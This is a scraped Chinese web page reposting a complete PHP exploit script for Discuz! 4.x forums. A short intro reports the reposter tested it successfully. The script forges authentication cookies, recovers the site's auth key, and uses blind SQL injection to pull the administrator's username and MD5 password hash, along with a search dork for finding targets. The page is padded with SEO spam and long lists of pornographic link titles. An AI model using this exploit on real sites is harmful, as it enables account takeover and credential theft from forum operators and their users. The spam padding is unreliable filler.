婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av

主頁 > 知識庫 > Discuz! 4.x SQL injection / admin credentials disclosure exploit

Discuz! 4.x SQL injection / admin credentials disclosure exploit

熱門標簽:寧夏保險智能外呼系統哪家好 臨滄移動外呼系統哪家有 溫嶺代理外呼系統 隨州銷售外呼系統平臺 不同的地圖標注 交行外呼系統有哪些 怎么更改地圖標注電話 激戰黃昏地圖標注說明 防城港市ai電銷機器人

前段時間發過Discuz! 5.0.0 GBK版本的EXP
今天在CN.Tink那里看到的4.x的,我去原站轉了過來,然后找了個Discuz! 4.1.0測試了一下,成功,看下面截圖,Discuz! 5.0.0 GBK版本的那個EXP又許多朋友不知道怎么用,當時我說了下,還是有朋友不明白,這次我截了圖上來,不知道怎么用的朋友看下應該明白的。
圖:http://photo.bababian.com/20061105/E8D09F4CD48014220CD6C955EC88FAC9_500.jpg

復制代碼 代碼如下:

?php
print_r('
---------------------------------------------------------------------------
Discuz! 4.x SQL injection / admin credentials disclosure exploit
by rgod rgod@autistici.org
site: http://retrogod.altervista.org
dork: "powered by discuz!
---------------------------------------------------------------------------
');
if ($argc3) {
 print_r('
---------------------------------------------------------------------------
Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to discuz
Options:
 -p[port]: specify a port other than 80
 -P[ip:port]: specify a proxy
Example:
php '.$argv[0].' localhost /discuz/ -P1.1.1.1:80
php '.$argv[0].' localhost /discuz/ -p81
---------------------------------------------------------------------------
');
 die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
 $result='';$exa='';$cont=0;
 for ($i=0; $i=strlen($string)-1; $i++)
 {
 if ((ord($string[$i]) = 32 ) | (ord($string[$i]) > 126 ))
 {$result.=" .";}
 else
 {$result.=" ".$string[$i];}
 if (strlen(dechex(ord($string[$i])))==2)
 {$exa.=" ".dechex(ord($string[$i]));}
 else
 {$exa.=" 0".dechex(ord($string[$i]));}
 $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
 }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';

function sendpacketii($packet)
{
 global $proxy, $host, $port, $html, $proxy_regex;
 if ($proxy=='') {
 $ock=fsockopen(gethostbyname($host),$port);
 if (!$ock) {
 echo 'No response from '.$host.':'.$port; die;
 }
 }
 else {
 $c = preg_match($proxy_regex,$proxy);
 if (!$c) {
 echo 'Not a valid proxy...';die;
 }
 $parts=explode(':',$proxy);
 echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
 $ock=fsockopen($parts[0],$parts[1]);
 if (!$ock) {
 echo 'No response from proxy...';die;
 }
 }
 fputs($ock,$packet);
 if ($proxy=='') {
 $html='';
 while (!feof($ock)) {
 $html.=fgets($ock);
 }
 }
 else {
 $html='';
 while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
 $html.=fread($ock,1);
 }
 }
 fclose($ock);
}

$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
for ($i=3; $i$argc; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
 $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
 $proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]>'/') or ($path[strlen($path)-1]>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

echo "please wait...\n";

//from global.func.php
function authcode($string, $operation, $key = '') {
 $key = $key ? $key : $GLOBALS['discuz_auth_key'];
 $coded = '';
 $keylength = 32;
 $string = $operation == 'DECODE' ? base64_decode($string) : $string;
 for($i = 0; $i  strlen($string); $i += 32) {
 $coded .= substr($string, $i, 32) ^ $key;
 }
 $coded = $operation == 'ENCODE' ? str_replace('=', '', base64_encode($coded)) : $coded;
 return $coded;
}

//stolen from install.php
function random($length) {
 $hash = '';
 $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
 $max = strlen($chars) - 1;
 mt_srand((double)microtime() * 1000000);
 for($i = 0; $i  $length; $i++) {
 $hash .= $chars[mt_rand(0, $max)];
 }
 return $hash;
}

$agent="Googlebot/2.1";
//see sql errors... you need auth key,
//it's a value mixed up with the random string in cache_settigns.php and your user-agent, so let's ask ;)
$tt="";for ($i=0; $i=255; $i++){$tt.=chr($i);}
while (1)
{
 $discuz_auth_key=random(32);
 $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
 $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof
 $packet.="User-Agent: $agent\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$tt,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 $html=html_entity_decode($html);
 $html=str_replace("br />","",$html);
 $t=explode("AND m.password='",$html);
 $t2=explode("' ",$t[1]);
 $pwd_f=$t2[0];
 $t=explode("AND m.secques='",$html);
 $t2=explode("'\n",$t[1]);
 $secques_f=$t2[0];
 $t=explode("AND m.uid='",$html);
 $t2=explode("'\x0d",$t[1]);
 $uid_f=$t2[0];
 $my_string=$pwd_f."\t".$secques_f."\t".$uid_f;
 if ((strlen($my_string)==270) and (!eregi("=",$my_string))){
 break;
 }
}
$temp = authcode("suntzu\tsuntzu\t".$tt,"ENCODE");
//calculating key...
$key="";
for ($j=0; $j32; $j++){
 for ($i=0; $i255; $i++){
 $aa="";
 if ($j>0){
 for ($k=1; $k=$j; $k++){
 $aa.="a";
 }
 }
 $GLOBALS['discuz_auth_key']=$aa.chr($i);
 $t = authcode($temp,"DECODE");
 if ($t[$j]==$my_string[$j]){
 $key.=chr($i);
 }
 }
}

//echo "AUTH KEY ->".$key."\r\n";
$GLOBALS['discuz_auth_key']=$key;

echo "pwd hash (md5) -> ";
$chars[0]=0;//null
$chars=array_merge($chars,range(48,57)); //numbers
$chars=array_merge($chars,range(97,102));//a-f letters
$j=1;$password="";
while (!strstr($password,chr(0)))
{
 for ($i=0; $i=255; $i++)
 {
 if (in_array($i,$chars))
 {
 //you can use every char because of base64_decode()...so this bypass magic quotes...
 //and some help by extract() to overwrite vars
 $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.password,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
 $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
 $packet.="User-Agent: $agent\r\n";
 $packet.="CLIENT-IP: 1.2.3.4\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 if (eregi("action=groupexpiry",$html)){
 $password.=chr($i);echo chr($i);sleep(1);break;
 }
 }
 if ($i==255) {
 die("\nExploit failed...");
 }
 }
$j++;
}

echo "\nadmin user -> ";
$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
 for ($i=0; $i=255; $i++)
 {
 $sql="999999'/**/UNION/**/SELECT/**/1,1,1,1,1,1,1,1,1,1,1,1,(IF((ASCII(SUBSTRING(m.username,$j,1))=".$i."),1,0)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/cdb_sessions/**/s,/**/cdb_members/**/m/**/WHERE/**/adminid=1/**/LIMIT/**/1/*";
 $packet ="GET ".$p."admincp.php?action=recyclebin HTTP/1.0\r\n";
 $packet.="User-Agent: $agent\r\n";
 $packet.="CLIENT-IP: 1.2.3.4\r\n";
 $packet.="Host: ".$host."\r\n";
 $packet.="Cookie: adminid=1; cdb_sid=1; cdb_auth=".authcode("suntzu\tsuntzu\t".$sql,"ENCODE").";\r\n";
 $packet.="Accept: text/plain\r\n";
 $packet.="Connection: Close\r\n\r\n";
 $packet.=$data;
 sendpacketii($packet);
 if (eregi("action=groupexpiry",$html)){
 $admin.=chr($i);echo chr($i);sleep(1);break;
 }
 if ($i==255) {die("\nExploit failed...");}
 }
$j++;
}

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {
 echo "exploit succeeded...";
}
else {
 echo "exploit failed...";
}
?>

標簽:忻州 沈陽 哈密 阜陽 河源 青海 紅河 無錫

巨人網絡通訊聲明:本文標題《Discuz! 4.x SQL injection / admin credentials disclosure exploit》,本文關鍵詞  Discuz,4.x,SQL,injection,admin,;如發現本文內容存在版權問題,煩請提供相關信息告之我們,我們將及時溝通與處理。本站內容系統采集于網絡,涉及言論、版權與本站無關。
  • 相關文章
  • 下面列出與本文章《Discuz! 4.x SQL injection / admin credentials disclosure exploit》相關的同類信息!
  • 本頁收集關于Discuz! 4.x SQL injection / admin credentials disclosure exploit的相關信息資訊供網民參考!
  • 推薦文章
    婷婷综合国产,91蜜桃婷婷狠狠久久综合9色 ,九九九九九精品,国产综合av
    a在线欧美一区| 激情亚洲综合在线| 亚洲一区在线观看视频| 91免费看`日韩一区二区| 亚洲国产精品ⅴa在线观看| 国产精品亚洲成人| 国产欧美日韩中文久久| 国产不卡高清在线观看视频| 国产日韩欧美电影| av不卡免费电影| 亚洲激情网站免费观看| 欧美剧情电影在线观看完整版免费励志电影 | 风间由美中文字幕在线看视频国产欧美| 日韩午夜激情电影| 国产成人免费在线观看| 亚洲欧美另类久久久精品2019| 欧美系列亚洲系列| 美洲天堂一区二卡三卡四卡视频 | 亚洲一区二区三区国产| 欧美日韩免费不卡视频一区二区三区| 日韩高清电影一区| 国产女人18毛片水真多成人如厕| 色婷婷av一区二区三区软件| 免费成人av资源网| 国产精品国产三级国产普通话99 | 欧美天堂亚洲电影院在线播放| 美女mm1313爽爽久久久蜜臀| 国产精品热久久久久夜色精品三区 | 欧美日韩高清在线播放| 韩国av一区二区| 亚洲综合在线视频| 国产欧美一区二区三区沐欲| 欧美三区在线视频| av一本久道久久综合久久鬼色| 亚洲123区在线观看| 亚洲欧洲日本在线| 欧美精品一区二| 欧美精品久久99久久在免费线 | 一区二区三区欧美视频| 日韩情涩欧美日韩视频| 99久久精品国产一区| 久久精品国内一区二区三区| 国产精品欧美极品| 91精品在线一区二区| 国产成人免费视频网站 | 欧美日韩二区三区| 成人国产亚洲欧美成人综合网| 青娱乐精品视频在线| 樱桃视频在线观看一区| 国产精品天美传媒| 精品对白一区国产伦| 欧美一区二区三区爱爱| 在线看国产一区二区| 成人黄页在线观看| 国产精品一区免费视频| 久久成人18免费观看| 蜜乳av一区二区三区| 首页国产欧美日韩丝袜| 亚洲一区二区四区蜜桃| 亚洲三级在线观看| 亚洲欧美日本在线| 亚洲免费观看高清完整版在线观看| 久久久精品tv| 久久一区二区三区国产精品| 久久女同互慰一区二区三区| 精品久久久久久久久久久久久久久久久| 欧美另类高清zo欧美| 欧美一级视频精品观看| 欧美一区二区视频在线观看2020| 欧美日本视频在线| 欧美浪妇xxxx高跟鞋交| 日韩欧美国产综合一区 | 成人a免费在线看| 不卡一卡二卡三乱码免费网站| 不卡欧美aaaaa| 99r国产精品| 欧美曰成人黄网| 欧美夫妻性生活| 日韩免费看的电影| 日韩精品在线一区| 国产精品污网站| 亚洲精品成a人| 青青草成人在线观看| 久久精品国产99久久6| 久久精品免费看| 成人黄色电影在线| 欧美日韩精品一区二区三区蜜桃 | 亚洲v日本v欧美v久久精品| 五月天中文字幕一区二区| 蜜臀av性久久久久蜜臀av麻豆| 狠狠色丁香婷婷综合久久片| jlzzjlzz亚洲日本少妇| 色综合久久久久| 欧美男同性恋视频网站| 日韩你懂的在线播放| 国产欧美一区二区精品性| 一区二区三区高清不卡| 欧美日韩视频第一区| 精品国产电影一区二区| 亚洲女人****多毛耸耸8| 亚洲精品成人在线| 九色综合国产一区二区三区| 岛国av在线一区| 欧美一区国产二区| 激情小说亚洲一区| 国产在线日韩欧美| 99久久精品久久久久久清纯| 51精品秘密在线观看| 国产女人18毛片水真多成人如厕| 视频一区免费在线观看| 国产aⅴ综合色| 日韩网站在线看片你懂的| 亚洲精品视频免费观看| 国内外精品视频| 欧美日韩国产不卡| 亚洲欧洲精品天堂一级| 激情国产一区二区| 欧美午夜精品久久久| 亚洲bt欧美bt精品| 成人av高清在线| 亚洲精品一区在线观看| 亚洲国产视频直播| 99re热视频精品| 国产精品欧美精品| 国产久卡久卡久卡久卡视频精品| 制服视频三区第一页精品| 亚洲美女免费视频| 成人黄色片在线观看| 久久久精品免费免费| 国产精一区二区三区| 久久综合九色综合欧美就去吻| 午夜精品免费在线观看| 欧美三级日韩在线| 亚洲成人动漫av| 91精品中文字幕一区二区三区| 石原莉奈在线亚洲三区| 欧美日韩成人高清| 日本欧美一区二区三区| 91精品国产乱| 久久精品国产亚洲一区二区三区| 日韩一区二区三区在线| 美国十次综合导航| 久久久美女毛片| 成人精品国产一区二区4080| 亚洲国产精品精华液ab| 岛国精品在线观看| |精品福利一区二区三区| 色婷婷综合久久久| 亚洲第一激情av| 欧美精品高清视频| 亚洲高清不卡在线观看| 欧美在线观看视频一区二区| 国产精品久久久久久久久图文区| 成人精品视频网站| 亚洲乱码中文字幕综合| 91亚洲精品久久久蜜桃网站| 国产精品无码永久免费888| 99re亚洲国产精品| 午夜激情久久久| 日韩免费一区二区三区在线播放| 国产成人免费在线视频| 亚洲一卡二卡三卡四卡无卡久久| 不卡欧美aaaaa| 亚洲不卡av一区二区三区| 亚洲成人激情自拍| 欧美日韩美少妇| 蜜桃av一区二区三区| 国产精品久久久久久久久图文区 | 一区二区三区欧美日韩| 在线观看日韩电影| 蜜臂av日日欢夜夜爽一区| 国产午夜精品理论片a级大结局| 91免费看片在线观看| 亚洲午夜私人影院| 日韩视频123| 91丝袜高跟美女视频| 日本麻豆一区二区三区视频| 国产精品日产欧美久久久久| 在线亚洲一区二区| 国产欧美一区二区三区鸳鸯浴| 91在线观看污| 日本中文在线一区| 国产欧美一区二区精品忘忧草 | 久久精品男人的天堂| 51精品国自产在线| 成人激情校园春色| 日韩av一区二区三区| 中文字幕久久午夜不卡| 欧美丝袜自拍制服另类| 国产99久久精品| 亚洲午夜久久久久久久久久久 | 亚洲一区二区三区美女| 国产精品美日韩| 精品日本一线二线三线不卡| 91欧美一区二区| 精品一区二区三区av| 天天综合色天天综合| 综合电影一区二区三区| 久久综合九色综合久久久精品综合 | 国产精品入口麻豆原神|